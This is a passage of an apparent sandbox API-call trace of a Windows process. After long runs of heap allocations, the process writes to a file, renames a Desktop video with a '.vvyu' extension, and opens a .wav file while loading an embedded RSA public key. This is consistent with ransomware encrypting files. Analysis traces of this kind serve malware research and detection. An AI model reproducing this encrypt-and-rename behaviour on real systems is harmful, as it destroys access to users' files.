lpDistanceToMoveHigh=0x0) returned 0x5 [0183.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0183.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0183.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30f88 [0183.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e798 [0183.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30fd0 [0183.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7b0 [0183.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7e0 [0183.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e840 [0183.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7f8 [0183.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0183.795] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0183.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0183.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0183.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e840 [0183.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0183.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7f8 [0183.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e7e0 [0183.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0183.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0183.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0183.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0183.798] GetCurrentThreadId () returned 0x264 [0183.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce6e0 [0183.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.799] GetCurrentThreadId () returned 0x264 [0183.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e840 [0183.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7e0 [0183.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0183.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7f8 [0183.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7c8 [0183.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e858 [0183.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0183.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e828 [0183.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e810 [0183.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e870 [0183.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e810 [0183.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0183.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0183.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7e0 [0183.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0183.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0183.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0183.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0183.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0183.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: hHeap=0x6a0000) returned 1 [0183.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30fd0 | out: hHeap=0x6a0000) returned 1 [0183.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0183.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0183.809] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x11b59, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x11b59, lpOverlapped=0x0) returned 1 [0183.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0183.811] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x11b5e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.811] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0183.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0183.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.812] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0183.813] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.813] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.813] CloseHandle (hObject=0x584) returned 1 [0183.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0183.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d41908 [0183.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0183.815] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\gnNW5oKgmW5QeElwN.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\gnnw5okgmw5qeelwn.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\gnNW5oKgmW5QeElwN.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\gnnw5okgmw5qeelwn.mp4.vvyu")) returned 1 [0183.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.818] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0183.821] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ba98df0, ftCreationTime.dwHighDateTime=0x1d899a7, ftLastAccessTime.dwLowDateTime=0x9e3fec10, ftLastAccessTime.dwHighDateTime=0x1d89d30, ftLastWriteTime.dwLowDateTime=0x9e3fec10, ftLastWriteTime.dwHighDateTime=0x1d89d30, nFileSizeHigh=0x0, nFileSizeLow=0xad91, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IabkKD4FQA.wav", cAlternateFileName="IABKKD~1.WAV")) returned 1 [0183.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30fd0 [0183.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30fd0 | out: hHeap=0x6a0000) returned 1 [0183.821] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\IabkKD4FQA.wav") returned=".wav" [0183.821] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\IabkKD4FQA.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\iabkkd4fqa.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.822] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=44433) returned 1 [0183.822] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.824] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xad6b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.824] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.826] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.826] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xad91, lpOverlapped=0x0) returned 1 [0183.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.827] lstrlenA (lpString="-----BEGIN PUBLIC 